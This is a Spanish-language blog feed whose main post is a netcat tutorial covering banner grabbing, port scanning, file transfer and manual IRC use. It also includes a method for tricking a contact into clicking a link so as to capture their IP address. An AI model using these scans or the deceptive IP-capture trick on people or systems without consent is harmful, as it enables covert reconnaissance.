<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6882397234957178715</id><updated>2012-02-16T14:35:16.727+01:00</updated><category term='uue es loq ue'/><title type='text'>Solo el conocimiento te hace libre</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>69</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-8679837487926358893</id><published>2010-01-10T19:42:00.004+01:00</published><updated>2010-01-10T19:46:36.765+01:00</updated><title type='text'>NetCat</title><content type='html'>NetCat, la navaja suiza de los hackers y administradores................&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Netcat es un pequeño programa creado para uso de los&lt;br /&gt;administradores de redes (y por supuesto para los Hackers) :), este&lt;br /&gt;proggie fue creado originalmente por Hobbit y porteado a Win95 y NT por&lt;br /&gt;Weld Pond de L0pht , tiene mas de un año desde que fue Liberado y muy&lt;br /&gt;poco se ha escrito sobre este Programita; Principalmente porque la estructura&lt;br /&gt;de sus comandos es poco familiar para el usuario medio. Netcat tiene&lt;br /&gt;infinidad de funciones, aunque se deja que sea el usuario quien las&lt;br /&gt;averigue :P, y en el archivo de ayuda ponen algunos ejemplitos muy&lt;br /&gt;elementales solamente...&lt;br /&gt;&lt;br /&gt;         La especialidad de NetCat es el Protocolo tcp/ip, y le dá a la&lt;br /&gt;máquina de windows, cierto poder sobre este protocolo que solo tenía&lt;br /&gt;UNIX,  trabaja con lineas de comandos desde MS-DOS (o desde el&lt;br /&gt;Shell de Linux), y según parece, puede hacer casi cualquier cosa sobre&lt;br /&gt;TCP/IP. El comando principal es nc con su respectiva variable u opción&lt;br /&gt;al mas puro estilio Unix.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;         Cabe destacar que la información sobre Netcat y sus usos&lt;br /&gt;especificos es bastante limitada; aunque Hobbit en su documento aclara&lt;br /&gt;muchas cosas, cita algunos ejemplos y dice que NetCat puede ser utilizado&lt;br /&gt;para mas de 1001 vainas...&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Ejemplos de como utilizar -NETCAT-.&lt;/span&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;(estos ejemplos pueden ser variados dependiendo de los modificadores)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u style="color: rgb(0, 153, 0);"&gt;Si queremos saber que versión de servidor esta corriendo en un puerto remoto&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Supongamos que queremos saber que versión webserver corre una determinada ip, para ello supongamos que la IP es 1.1.1.1, entonces tipearemos lo siguiente:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc –v –v 1.1.1.1 80&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde &lt;span style="font-weight: bold;"&gt;nc es la invocación al netcat&lt;/span&gt;, -v –v nos dará todo la info visible del servidor que esta corriendo, 1.1.1.1 es la ip y 80 el puerto al que nos queremos conectar, bien, no solo que nos dio la versión del servidor si no que ahora estamos conectados al webserver y podemos realizar las operaciones normales que podría hacer el browser(en línea de comandos, por su puesto), pero eso para otro capitulo jejejejejeje.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Si quisiéramos saber la versión de cualquier otro servidor solo habrá que conectarse a el a través de su ip + puerto con la opción very vervose y ya sabremos algo de ese servicio ;)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Un chat p2p&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;Se necesita que los dos tengan netcat, uno va a actuar de servidor y otro de cliente.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;EL SERVER&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc –l –p (numero de puerto)&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -l se pone a la escucha o en modo servidor, y –p es el puerto por donde escuchara&lt;/p&gt;  &lt;p class="MsoNormal"&gt;EL CLIENTE&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc ip puerto &lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, ip es la ip del server, y puerto el puerto que este abrió&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Una vez realizado esto, podrán escribir en la pantalla donde esta corriendo netcat y al dar ENTER el otro vera lo que escribamos, una opción rápida y segura&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Como sacar la ip de cualquier mensajero ( y algunos otros datos jejejjej)&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Primero usamos la herramienta netcat (o nc) con la siguientes modificadores:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc -v -v -l -p 80&lt;/b&gt; &lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del browser y sistema operativo, -l lo pone en modo escucha o servidor , y –p 80 le asigna el puerto 80 a la escucha &lt;/p&gt;  &lt;p class="MsoNormal"&gt;Luego le pasamos lo siguiente, http://nuestra ip (usando alguna excusa, si no queremos que nuestro contacto sospeche), automáticamente se abrirá su navegador y se dirigirá a donde esta nuestro netcat a la escucha, entonces veremos en la ventana DOS donde se esta ejecutando el netcat, la ip de nuestro contacto ( con suerte también veremos la versión del navegador que usa y alguna que otra cosita mas)luego que tomamos nota de la ip, hacemos ctrl+C para cerrar netcat, y le aparecerá a nuestro contacto, en el navegador pagina típica de cuando no se encuentra el servidor (esto no pasara hasta que no cerremos el netcat con ctrl+C), buscamos la excusa que mas nos guste para explicar que la page que le pasamos no funciono y listo&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Si queremos hacer una trampa para lammers y capturar su ip&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Pues esto se basa en que un lamer, para entrar a una maquina, primero escanea puertos y si encuentra alguno vulnerable (como por ejemplo el puerto de un troyano) entra usando la herramienta necesaria.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Bien, esto se trata de hacerle creer al lammeruzo que tenemos esos puertos que abren los servidores de los troyanos abiertos (por lo tanto pensara que estamos infectados y tratara de entrar por ese puerto y allí tendremos el netcat listo para cazar su ip&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Para esto abriremos tantos netcat como puertos queramos simular infección (seria bueno que busques una lista de puertos que usan los troyanos y abras los que te parezcan) y lo haremos si con cada puerto&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc -v -v -l -p (numero de puerto de troyano)&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -v –v lo pone en modo very verbose y eso hace que al conectarse alguien a nuestra ip y puerto le rastrea la ip y los datos del cliente que uso para conectarse, -l lo pone en modo escucha o servidor, y –p (será el puerto que simulara que allí hay un troyano), listo de esa manera ya tenemos la ip de quien trato de entrar a nuestra maquina a través de un troyano.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Cabe destacar que esto sirve para cualquier servicio como ser web o ftp&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Mostrar una pagina web con netcat (o como simular un webserver)&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt; &lt;/span&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Todos sabemos que si queremos mostrar una pagina web necesitamos un webserver, bien aquí vamos a improvisar uno (simulado lógicamente).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Para mostrar nuestra page en Internet haremos esto:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;1) guardamos el html que queremos mostrar, en la misma carpeta que se encuentra netcat, luego tipemos esto:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc –l –p 80 &lt;&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -l hace que se ponga a la escucha, -p 80 hace que el puerto que escucha sea el el 80(el mismo del http), &lt;&gt; &lt;/p&gt;&lt;p class="MsoNormal"&gt;Cabe destacar que cada vez que alguien se desconecta tendremos que volver a realizar la operación para que vuelva a ser visto el html&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 153, 0);" class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;Transferir archivos con netcat&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Para transferir archivos con netacat primero tendré que destacar que solo hice la prueba con archivos zipeados, pero pueden probar con otros formatos, además, netcat no puede ver el EOF(end of file o final de archivo) así que no terminara la transferencia por si solo, cuando estimen un tiempo prudencial (si lo hacen antes de que termine se corta y se daña el archivo)deben darle ctrl+C para terminar la transferencia y así hacer un EOF. Bien, dicho esto pasemos al trabajo. Necesitaremos uno que haga de Server (el que envía el archivo) y uno que haga de cliente (el que recibe el archivo), para ello tipearemos:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;EL SERVER&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc –l –p (puerto) &lt;&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -l pone le puerto a la escucha, -p (puerto) sera el puerto que pondremos a la escucha, &lt;&gt;  &lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;EL CLIENTE&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc ip puerto &gt; archivo.zip&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, ip es la ip a la que queremos conectar, puerto es al puerto remoto que queremos conectar , &gt; archivo,zip, es el redireccionamiento de la entrada a un archivo. &lt;/p&gt;  &lt;p class="MsoNormal"&gt;Listo, si tenemos en cuenta todas las recomendaciones, transferiremos sin problemas&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="color: rgb(0, 153, 0);" class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;Conectarse a irc con netcat&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Bien para esto hay que destacar que es sencillo lograr la conexión pero no hay que olvidar que una vez lograda hay que “hablar idioma servidor” o sea hacer toda la negociación a mano.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Para ello vamos a topear:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc servidor irc puerto&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, servidor irc es el servidor al que nos queremos conectar, y puerto el puerto al cual vamos a conectarnos (para graficarlo mejor vamos a poner de ejemplo una conexión al canal yashira que esta en el sevidor irc.cl, el comando seria así &lt;b&gt;nc irc.cl 6667,&lt;/b&gt; y listo ya estaríamos conectados), pero en esta parte considero que poner un ejemplo totalmente practico ayudaría bastante, por eso voy a desarrollar un ejemplo de cómo me conecto al canal yashira con netcat&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Para hacerlo tipeo el comando que me conecta&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Luego tipeo PONG mi ip (esto debo hacerlo rápidamente para que no de time out la conexión).&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Inmediatamente tenemos que identificarnos para eso topeamos:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;USER nombre que elijas (no es tu nick) tu host tu servidor: tu nombre real(esto puedes omitirlo, pero no olvides poner : y luego dejarlo vació), luego de eso tipeas:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;NICK tu nick &lt;/p&gt;  &lt;p class="MsoNormal"&gt;pero mas grafico lo hago con el ejemplo practico:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;USER yo NETGlobalis.irc.cl :&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;NICK cadorna&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;aquí ya esta en el irc.cl para entrar al canal tipeas:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;join #canal &lt;/b&gt;(en mi caso join #yashira)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ya tamos en el canal, ahora si queres hablar tipeas:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;PRIVMSG #canal :texto&lt;/b&gt; (en mi caso digo hola, PRIVMSG #yashira : hola)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Cabe destacar que si bien es un método complicado y muchas veces las negociaciones dependen del servidor, nos muestra la versatilidad de netcat, y estos no son todos los comandos de irc experimenta comandos que usas en el con netcat, tal vez resulte interesante (les dejo un poco de experimentación para ustedes, si no me van a matar jajajajajajaaj)&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Hacer un sencillo escanner de puertos con netcat&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Esto es muy simple para chequear los puertos abiertos de una maquina debemos topear:&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b&gt;C:\nc –v –v -z ip puerto &lt;/b&gt;(cabe destacar que si queremos hacer un scanner de rango de puertos debemos separa ese rango con un “-“ por ejemplo queremos escasear todos los puertos desde el 21 al 139, debemos hacer así: nc –v –v –z ip 21-139, y si lo que queremos es escasear puertos determinados&lt;span style=""&gt;  &lt;/span&gt;hay que separar los números de puertos con espacio por ejemplo nc –v –v –z ip 21 25 139, de esta manera buscara solo en esos puertos)&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Donde nc llama al netcat, -v-v lo pone en modo veri vervose(ideal para sacar datos), z realiza la llamada al puerto pero si llegar a hacer la transacción de conexión, ip es la ip a escannear , y puerto es el puerto a escannear, esto nos devolverá una lectura de open(puerto abierto) o conection refused (puerto cerrado), y hasta a lo mejor recibas que servicio esta corriendo en ese puerto abierto&lt;/p&gt;&lt;p class="MsoNormal"&gt;fuente: http://hackdosx.blogspot.com/&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-8679837487926358893?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/8679837487926358893/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/netcat.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8679837487926358893'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8679837487926358893'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/netcat.html' title='NetCat'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-7251507608069128085</id><published>2010-01-07T18:13:00.003+01:00</published><updated>2010-01-07T18:16:49.649+01:00</updated><title type='text'>Cómo eliminar virus de MSN Messenger y Windows Live Messenger</title><content type='html'>Aqui tenis un recopilatorio de los programas mas usado:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Recientemente, las mentes dedicadas a la creación de virus han centrado sus esfuerzos en el cliente de mensajería instantánea de Microsoft. &lt;p&gt;Por suerte, otras mentes más generosas se han puesto manos a la obra y han contraatacado con programas específicos para eliminar los virus &lt;em&gt;del Messenger&lt;/em&gt;.&lt;/p&gt; &lt;p&gt;En este artículo recopilamos varias herramientas para eliminar virus de MSN Messenger. ¿Quieres conocerlas?&lt;span id="more-3044"&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;La primera utilidad es &lt;strong&gt;&lt;a href="http://msn-virus-remover.softonic.com/"&gt;MSN Virus Remover&lt;/a&gt;&lt;/strong&gt;. Está en español y mantiene su base de datos de virus actualizada. En este momento detecta 11.675 virus.&lt;/p&gt; &lt;p&gt;Además, si el virus te había bloqueado el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta, MSN Virus Remover te lo devuelve.&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;img src="http://es.onsoftware.com/wp-content/uploads/2009/04/msn1.png" /&gt;&lt;/p&gt; &lt;p&gt;Otra interesante opción es &lt;a href="http://msn-virus-cleaner.softonic.com/"&gt;&lt;strong&gt;MSN Virus Cleaner&lt;/strong&gt;&lt;/a&gt;. Analiza, detecta y elimina los procesos sospechosos relacionados con MSN Messenger. También tiene accesos para desinfectar archivo y carpeta, así como para eliminar la caché y vaciar la Papelera de Reciclaje.&lt;/p&gt; &lt;p&gt;Una ventaja de  MSN Virus Cleaner es que detecta y elimina virus de otros clientes de mensajería como Yahoo! Messenger o AOL.&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;img src="http://es.onsoftware.com/wp-content/uploads/2009/04/msnviruscleaner.png" width="575" height="473" /&gt;&lt;/p&gt; &lt;p&gt;También existe &lt;strong&gt;&lt;a href="http://livekill-clean-messenger.softonic.com/"&gt;Live Kill Clean Messenger&lt;/a&gt;&lt;/strong&gt; pero parece un proyecto abandonado, cuanto menos inacabado. Sólo lo recomendamos por si los dos anteriores no han conseguido eliminar el virus que tengas y no te importa probar suerte con LiveKill Clean Messenger.&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;img src="http://es.onsoftware.com/wp-content/uploads/2009/04/livekill.jpg" /&gt;&lt;/p&gt; &lt;p&gt;Finalizamos con el más popular: &lt;strong&gt;&lt;a href="http://msncleaner.softonic.com/"&gt;MSNCleaner&lt;/a&gt;&lt;/strong&gt;. Está en español, no requiere instalación, es rápido, eficaz, seguro y fácil de utilizar.&lt;/p&gt; &lt;p&gt;Como MSN Virus Remover, MSNCleaner también te devuelve el acceso al Editor del Registro, al Administrador de tareas, a la configuración de las funciones de restauración o a las Opciones de carpeta. Además, también restaura el archivo Hosts (a tener en cuenta si lo tenías personalizado).&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;img src="http://es.onsoftware.com/wp-content/uploads/2009/05/msncleaner.png" /&gt;&lt;/p&gt; &lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;fuemte:http://es.onsoftware.com/&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-7251507608069128085?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/7251507608069128085/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/como-eliminar-virus-de-msn-messenger-y.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7251507608069128085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7251507608069128085'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/como-eliminar-virus-de-msn-messenger-y.html' title='Cómo eliminar virus de MSN Messenger y Windows Live Messenger'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3342031955673195461</id><published>2010-01-03T17:36:00.002+01:00</published><updated>2010-01-03T17:38:13.072+01:00</updated><title type='text'>Recupera archivos borrados en tu disco duro o tarjeta de memoria</title><content type='html'>&lt;div id="prg_description" class="description_l"&gt; &lt;div id="intelliTXT"&gt;  &lt;div id="desc_body" class="description"&gt; &lt;p&gt;¿Has borrado archivos sin querer? No te desesperes, hoy en día hay decenas de aplicaciones para recuperar los archivos borrados, &lt;a href="http://undelete-plus.softonic.com/descargar"&gt;Undelete&lt;/a&gt; Plus sin ir más lejos.&lt;/p&gt; &lt;p&gt;Este programa gratuito analizará tu disco duro, dale tiempo, este proceso suele tardar mucho (incluso horas, dependiendo del tamaño del disco duro), y te mostrará todos los archivos que encuentre.&lt;/p&gt; &lt;p&gt;Como sabrás, cuando un archivo se borra el espacio que ocupaba en tu disco duro pasa a estar libre, así que si has seguido utilizando ese PC aumentan las posibilidades de que el espacio que ocupaba el archivo haya sido ocupado por un nuevo inquilino, con lo que será más complicado que lo puedas recuperar. Undelete Plus te lo indica en su columna "Estado".&lt;/p&gt; &lt;p&gt;Volviendo al programa, encontramos dos interesantes cualidades: la ordenación por tipos de archivos y el filtro. La primera resulta muy útil si deseas recuperar algún tipo de archivo en concreto, un documento, unas fotos, etc. La segunda cualidad es utilísima para ver sólo los archivos que reúnan las características que le indiques, como mayor o menor de un tamaño concreto, los comprendidos entre una fecha o los que contengan una determinada palabra en su nombre.&lt;/p&gt;  &lt;/div&gt; &lt;/div&gt;   &lt;div id="more_info" class="clearfix"&gt;  &lt;h3&gt;Undelete Plus soporta los siguientes formatos:&lt;/h3&gt;  &lt;p&gt;Sistemas de archivos: NTFS/NTFS5, FAT12/FAT16/FAT32&lt;/p&gt;    &lt;h3&gt;Cambios recientes en &lt;strong&gt;Undelete Plus&lt;/strong&gt;:&lt;/h3&gt;  &lt;ul&gt;&lt;li&gt;Pequeños cambios en la interfaz&lt;/li&gt;&lt;/ul&gt;    &lt;h3&gt;Para utilizar &lt;strong&gt;Undelete Plus&lt;/strong&gt; necesitas:&lt;/h3&gt;   &lt;ul class="clearfix"&gt;&lt;li&gt;Sistema operativo: Win98/98SE/Me/2000/NT/XP/2003 &lt;/li&gt;&lt;/ul&gt;   &lt;/div&gt;      &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3342031955673195461?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3342031955673195461/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/recupera-archivos-borrados-en-tu-disco.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3342031955673195461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3342031955673195461'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2010/01/recupera-archivos-borrados-en-tu-disco.html' title='Recupera archivos borrados en tu disco duro o tarjeta de memoria'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-1195675974134370644</id><published>2009-12-28T14:30:00.002+01:00</published><updated>2009-12-28T14:31:57.872+01:00</updated><title type='text'>0 Day en Adobe Acrobat Reader</title><content type='html'>&lt;p class="date-header"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YNIDIRwEu4M/SyqhV_QVwyI/AAAAAAAAAgI/uJ7n62pBq54/s1600-h/acrobat+reader.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 184px; height: 145px;" src="http://1.bp.blogspot.com/_YNIDIRwEu4M/SyqhV_QVwyI/AAAAAAAAAgI/uJ7n62pBq54/s400/acrobat+reader.jpg" alt="" id="BLOGGER_PHOTO_ID_5416318900995736354" border="0" /&gt;&lt;/a&gt;Bueno de nuevo tenemos otra&lt;a href="http://es.wikipedia.org/wiki/Ataque_de_d%C3%ADa_cero"&gt; vulnerabilidad 0 day&lt;/a&gt; en una aplicación muy conocida y utilizada por muchos usuarios, &lt;a 